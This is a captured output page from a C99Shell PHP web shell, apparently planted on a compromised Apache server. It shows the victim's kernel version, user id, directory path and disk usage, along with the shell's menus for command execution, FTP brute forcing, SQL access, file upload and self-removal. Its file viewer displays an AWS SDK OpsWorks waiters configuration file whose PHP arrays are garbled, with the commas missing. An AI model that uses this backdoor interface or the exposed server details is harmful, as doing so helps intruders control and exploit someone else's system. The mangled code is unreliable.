!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/aws/aws-sdk-php/src/data/opsworks/2013-02-18/   drwxr-xr-x
Free 13.19 GB of 57.97 GB (22.75%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     waiters-2.json.php (5.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// This file was auto-generated from sdk-root/src/data/opsworks/2013-02-18/waiters-2.json
return [ 'version' => 2'waiters' => [ 'AppExists' => [ 'delay' => 1'operation' => 'DescribeApps''maxAttempts' => 40'acceptors' => [ [ 'expected' => 200'matcher' => 'status''state' => 'success', ], [ 'matcher' => 'status''expected' => 400'state' => 'failure', ], ], ], 'DeploymentSuccessful' => [ 'delay' => 15'operation' => 'DescribeDeployments''maxAttempts' => 40'description' => 'Wait until a deployment has completed successfully.''acceptors' => [ [ 'expected' => 'successful''matcher' => 'pathAll''state' => 'success''argument' => 'Deployments[].Status', ], [ 'expected' => 'failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Deployments[].Status', ], ], ], 'InstanceOnline' => [ 'delay' => 15'operation' => 'DescribeInstances''maxAttempts' => 40'description' => 'Wait until OpsWorks instance is online.''acceptors' => [ [ 'expected' => 'online''matcher' => 'pathAll''state' => 'success''argument' => 'Instances[].Status', ], [ 'expected' => 'setup_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'shutting_down''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'start_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stopped''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stopping''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'terminating''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'terminated''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stop_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], ], ], 'InstanceRegistered' => [ 'delay' => 15'operation' => 'DescribeInstances''maxAttempts' => 40'description' => 'Wait until OpsWorks instance is registered.''acceptors' => [ [ 'expected' => 'registered''matcher' => 'pathAll''state' => 'success''argument' => 'Instances[].Status', ], [ 'expected' => 'setup_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'shutting_down''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stopped''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stopping''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'terminating''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'terminated''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stop_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], ], ], 'InstanceStopped' => [ 'delay' => 15'operation' => 'DescribeInstances''maxAttempts' => 40'description' => 'Wait until OpsWorks instance is stopped.''acceptors' => [ [ 'expected' => 'stopped''matcher' => 'pathAll''state' => 'success''argument' => 'Instances[].Status', ], [ 'expected' => 'booting''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'pending''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'rebooting''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'requested''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'running_setup''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'setup_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'start_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'stop_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], ], ], 'InstanceTerminated' => [ 'delay' => 15'operation' => 'DescribeInstances''maxAttempts' => 40'description' => 'Wait until OpsWorks instance is terminated.''acceptors' => [ [ 'expected' => 'terminated''matcher' => 'pathAll''state' => 'success''argument' => 'Instances[].Status', ], [ 'expected' => 'ResourceNotFoundException''matcher' => 'error''state' => 'success', ], [ 'expected' => 'booting''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'online''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'pending''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'rebooting''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'requested''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'running_setup''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'setup_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], [ 'expected' => 'start_failed''matcher' => 'pathAny''state' => 'failure''argument' => 'Instances[].Status', ], ], ], ],];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--